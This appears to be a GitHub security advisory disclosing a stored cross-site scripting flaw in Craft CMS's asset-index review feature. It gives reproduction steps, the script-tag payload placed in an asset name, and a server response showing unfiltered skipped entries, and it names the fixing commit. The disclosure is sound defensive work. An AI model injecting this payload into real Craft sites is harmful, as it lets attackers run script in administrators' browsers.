Craft CMS stored XSS in review volume

Summary

XSS can be triggered by review volumes

PoC

1. Access setting tab
2. Create new assets
3. In assets name inject payload: "<script>alert(1337)</script>
4. Click Utilities tab
5. Choose all volumes, or volume trigger xss
6. Click Update asset indexes.
7. Wait to assets update success.
8. Progress complete.
9. Click on review button will trigger XSS

Root cause

Function: index.php?p=admin/actions/asset-indexes/process-indexing-session&v=1680710595770
After loading completed, progess will load:
"skippedEntries"
and
"missingEntries"
These parameters is not yet filtered, I just tried "skippedEntries" but I think it will be work with "missingEntries"

My reponse:

{
"session": {
"id": 10,
"indexedVolumes": {
"6": ""<script>alert(1337)</script>"
},
"totalEntries": 2235,
"processedEntries": 2235,
"cacheRemoteImages": true,
"listEmptyFolders": false,
"isCli": false,
"actionRequired": true,
"dateCreated": "Apr 5, 2023, 9:03:16 AM",
"skippedEntries": [
""<script>alert(1337)</script>/assetpreviews/Image.php",
""<script>alert(1337)</script>/assetpreviews/Pdf.php"
],
"missingEntries": {
"folders": [],
"files": []
},
"processIfRootEmpty": false
},
"skipDialog": false
}

Resolved in craftcms/cms@053d711

References

angrybrad published to craftcms/cms May 25, 2023

Published to the GitHub Advisory Database May 26, 2023

Reviewed May 26, 2023

Published by the National Vulnerability Database May 26, 2023

Last updated Nov 8, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Package

Affected versions

Patched versions

Description

Summary

PoC

Root cause

My reponse:

References

Severity

CVSS base metrics

Weaknesses

CVE ID

GHSA ID

Source code

Credits